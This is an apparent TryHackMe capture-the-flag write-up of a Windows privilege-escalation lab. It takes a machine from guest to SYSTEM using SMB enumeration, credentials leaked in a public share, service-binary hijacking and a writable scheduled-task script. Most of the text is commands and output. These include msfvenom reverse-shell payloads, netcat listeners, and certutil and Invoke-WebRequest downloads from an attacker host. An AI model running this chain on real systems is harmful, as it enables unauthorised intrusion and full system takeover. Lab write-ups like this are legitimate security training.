Windows Jump (TryHackMe)
Updated
•9 min read
Link to the Privilege Escalation Challenge on TryHackMe: Windows Jump
Challenge
A routine vulnerability scan flagged a Windows machine on the internal network; nothing alarming on the surface, just a standard workstation left behind after a round of layoffs. IT never cleaned it up properly. Your job is to find out how badly. Your objective is to escalate from guest access all the way through:
guest → thmuser → notadmin → svcadmin → SYSTEM
Answer the questions below
What are the contents of flag1.txt?
enum4linux -S TARGET_IP
ENUM4LINUX - next generation (v1.3.10)
==========================
| Target Information |
==========================
[*] Target ........... TARGET_IP
[*] Username ......... ''
[*] Random Username .. 'beutqkwr'
[*] Password ......... ''
[*] Timeout .......... 10 second(s)
======================================
| Listener Scan on TARGET_IP |
======================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================
| SMB Dialect Check on TARGET_IP |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false
============================================================
| Domain Information via SMB session for TARGET_IP |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: PRIVESC
NetBIOS domain name: ''
DNS domain: privesc
FQDN: privesc
Derived membership: workgroup member
Derived domain: unknown
==========================================
| RPC Session Check on TARGET_IP |
==========================================
[*] Check for anonymous access (null session)
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for guest access
[+] Server allows authentication via username 'beutqkwr' and password ''
[H] Rerunning enumeration with user 'beutqkwr' might give more results
[!] Aborting remainder of tests, sessions are possible, but not with the provided credentials (see session check results)
Completed after 0.24 seconds
nmap --script smb-enum-shares -p 445 TARGET_IP
PORT STATE SERVICE
445/tcp open microsoft-ds
crackmapexec smb TARGET_IP --shares
SMB TARGET_IP 445 PRIVESC [*] Windows 10.0 Build 17763 x64 (name:PRIVESC) (domain:privesc) (signing:False) (SMBv1:False)
SMB TARGET_IP 445 PRIVESC [-] Error getting user: list index out of range
SMB TARGET_IP 445 PRIVESC [-] Error enumerating shares: [Errno 32] Broken pipe
smbclient -L //TARGET_IP -U 'guest'%''
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Public Disk Public file share
SMB1 disabled -- no workgroup available
root@ip-10-113-84-198:~# crackmapexec smb TARGET_IP -u 'guest' -p '' --shares
SMB TARGET_IP 445 PRIVESC [*] Windows 10.0 Build 17763 x64 (name:PRIVESC) (domain:privesc) (signing:False) (SMBv1:False)
SMB TARGET_IP 445 PRIVESC [+] privesc\guest:
SMB TARGET_IP 445 PRIVESC [*] Enumerated shares
SMB TARGET_IP 445 PRIVESC Share Permissions Remark
SMB TARGET_IP 445 PRIVESC ----- ----------- ------
SMB TARGET_IP 445 PRIVESC ADMIN$ Remote Admin
SMB TARGET_IP 445 PRIVESC C$ Default share
SMB TARGET_IP 445 PRIVESC IPC$ READ Remote IPC
SMB TARGET_IP 445 PRIVESC Public READ Public file share
root@ip-10-113-84-198:~# enum4linux -S -u 'guest' -p '' TARGET_IP
ENUM4LINUX - next generation (v1.3.10)
==========================
| Target Information |
==========================
[*] Target ........... TARGET_IP
[*] Username ......... 'guest'
[*] Random Username .. 'nihhqcrh'
[*] Password ......... ''
[*] Timeout .......... 10 second(s)
======================================
| Listener Scan on TARGET_IP |
======================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================
| SMB Dialect Check on TARGET_IP |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false
============================================================
| Domain Information via SMB session for TARGET_IP |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: PRIVESC
NetBIOS domain name: ''
DNS domain: privesc
FQDN: privesc
Derived membership: workgroup member
Derived domain: unknown
==========================================
| RPC Session Check on TARGET_IP |
==========================================
[*] Check for anonymous access (null session)
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for password authentication
[+] Server allows authentication via username 'guest' and password ''
[*] Check for guest access
[+] Server allows authentication via username 'nihhqcrh' and password ''
[H] Rerunning enumeration with user 'nihhqcrh' might give more results
====================================================
| Domain Information via RPC for TARGET_IP |
====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member
=======================================
| Shares via RPC on TARGET_IP |
=======================================
[*] Enumerating shares
[+] Found 4 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
Public:
comment: Public file share
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share Public
[+] Mapping: OK, Listing: OK
Completed after 0.83 seconds
nmap -sC -sV -p- TARGET_IP --min-rate 1000
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-06-23T17:42:25+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: PRIVESC
| NetBIOS_Domain_Name: PRIVESC
| NetBIOS_Computer_Name: PRIVESC
| DNS_Domain_Name: privesc
| DNS_Computer_Name: privesc
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-23T17:42:17+00:00
| ssl-cert: Subject: commonName=privesc
| Not valid before: 2026-05-10T06:39:22
|_Not valid after: 2026-11-09T06:39:22
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Through the
smbclientwe find a text file that has the credentials of thethmuserWith the credentials, we can launch RDP, then look forflag1.
smbclient //TARGET_IP/Public -U 'guest'%''
smb: \> ls
smb: \> dir
smb: \> get welcome.txt
cat welcome.txt
Welcome to CORP-NET.
New employee default credentials
================================
Username : thmuser
Password : Password1!
Please change your password after first login.
- Launch RDP using the command below:
xfreerdp /u:thmuser /p:'Password1!' /v:TARGET_IP
Looking around the Windows files, we find flag1, but we can see the other 3 flag files; we don't have permissions to open them, which we'll have to make use of privilege escalation skills to be able to access them in the next set of questions.
What are the contents of flag2.txt?
PS C:\Users\thmuser.PRIVESC> cmdkey \list
The command line parameters are incorrect.
The syntax of this command is:
CMDKEY [{/add | /generic}:targetname {/smartcard | /user:username {/pass{:password}}} | /delete{:targetname | /ras} | /list{:targetname}]
Examples:
To list available credentials:
cmdkey /list
cmdkey /list:targetname
To create domain credentials:
cmdkey /add:targetname /user:username /pass:password
cmdkey /add:targetname /user:username /pass
cmdkey /add:targetname /user:username
cmdkey /add:targetname /smartcard
To create generic credentials:
The /add switch may be replaced by /generic to create generic credentials
To delete existing credentials:
cmdkey /delete:targetname
To delete RAS credentials:
cmdkey /delete /ras
cmd /c "whoami /priv"
>> cmd /c "whoami /groups"
>> cmd /c "type C:\Users\thmuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
>> cmd /c "reg query ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"""
>> cmd /c "schtasks /query /fo LIST /v" | findstr -i "notadmin"
>> cmd /c "net users"
xfreerdp /u:notadmin /p:'P@ssw0rd!' /v:TARGET_IP
xfreerdp /u:notadmin /p:'P@ssw0rd!' /v:TARGET_IP /kbd:US /kbd-type:7
runas /user:notadmin cmd
- It'll prompt for the password — enter
P@ssw0rd!
runas /user:notadmin cmd
Enter the password for notadmin:
Attempting to start cmd as user "PRIVESC\notadmin" ...
dir \Users\notadmin\Desktop
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\notadmin\Desktop
05/11/2026 06:41 AM <DIR> .
05/11/2026 06:41 AM <DIR> ..
05/11/2026 06:41 AM 27 flag2.txt
1 File(s) 27 bytes
2 Dir(s) 14,699,880,448 bytes free
C:\Windows\system32>type \Users\notadmin\Desktop\flag2.txt
THM{w1nl0g0n_REDACTED_3xp0s3d}
What are the contents of flag3.txt?
xfreerdp /u:thmuser /p:'Password1!' /v:TARGET_IP
runas /user:notadmin cmd
Enter the password for notadmin: P@ssw0rd!
nc -lvnp 4545
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=4545 -f exe-service -o svc.exe
python3 -m http.server 8000
powershell -c "Invoke-WebRequest -Uri http://ATTACK_IP:8000/svc.exe -OutFile C:\Windows\THMSVC\svc.exe"
sc start THMSvc
nc -lvnp 4545
Listening on 0.0.0.0 4545
Connection received on 10.114.177.1 49948
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type \Users\svcadmin\Desktop\flag3.txt
type \Users\svcadmin\Desktop\flag3.txt
THM{s3rv1c3_REDACTED_h1j4ck3d}
What are the contents of flag4.txt?
nc -lvnp 5555
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=5555 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: shell.exe
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.114.177.1 - - [24/Jun/2026 07:49:57] "GET /svc.exe HTTP/1.1" 200 -
10.114.177.1 - - [24/Jun/2026 07:50:42] "GET /svc.exe HTTP/1.1" 200 -
cmd /c "echo C:\Windows\Tasks\shell.exe > C:\Windows\Tasks\Cleanup.bat"
cmd /c "echo C:\Windows\Tasks\shell.exe > C:\Windows\Tasks\Cleanup.bat"
C:\Windows\system32>sc start THMSvc
sc start THMSvc
SERVICE_NAME: THMSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 3468
FLAGS :
C:\Windows\system32>certutil -urlcache -split -f http://ATTACK_IP:8000/shell.exe C:\Windows\Tasks\shell.exe
certutil -urlcache -split -f http://ATTACK_I:8000/shell.exe C:\Windows\Tasks\shell.exe
**** Online ****
0000 ...
1e00
CertUtil: -URLCache command completed successfully.
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.114.177.1 - - [24/Jun/2026 07:49:57] "GET /svc.exe HTTP/1.1" 200 -
10.114.177.1 - - [24/Jun/2026 07:50:42] "GET /svc.exe HTTP/1.1" 200 -
10.114.177.1 - - [24/Jun/2026 08:07:12] "GET /shell.exe HTTP/1.1" 200 -
10.114.177.1 - - [24/Jun/2026 08:07:12] "GET /shell.exe HTTP/1.1" 200 -
C:\Windows\system32>dir C:\Windows\Tasks\shell.exe
type C:\Windows\Tasks\Cleanup.batdir C:\Windows\Tasks\shell.exe
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Windows\Tasks
06/24/2026 08:07 AM 7,680 shell.exe
1 File(s) 7,680 bytes
0 Dir(s) 14,704,111,616 bytes free
C:\Windows\system32>type C:\Users\Administrator\Desktop\flag4.txt
type C:\Windows\Tasks\Cleanup.battype C:\Users\Administrator\Desktop\flag4.txt
The system cannot find the file specified.
Error occurred while processing: C:\Windows\Tasks\Cleanup.battype.
Access is denied.
C:\Windows\system32>sc start THMSvc
sc start THMSvc
SERVICE_NAME: THMSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 248
FLAGS :
C:\Windows\system32>
nc -lvnp 5555
C:\Windows\system32>type C:\flag4.txt
type C:\flag4.txt
THM{t4sk_REDACTED_t0_SYST3M}
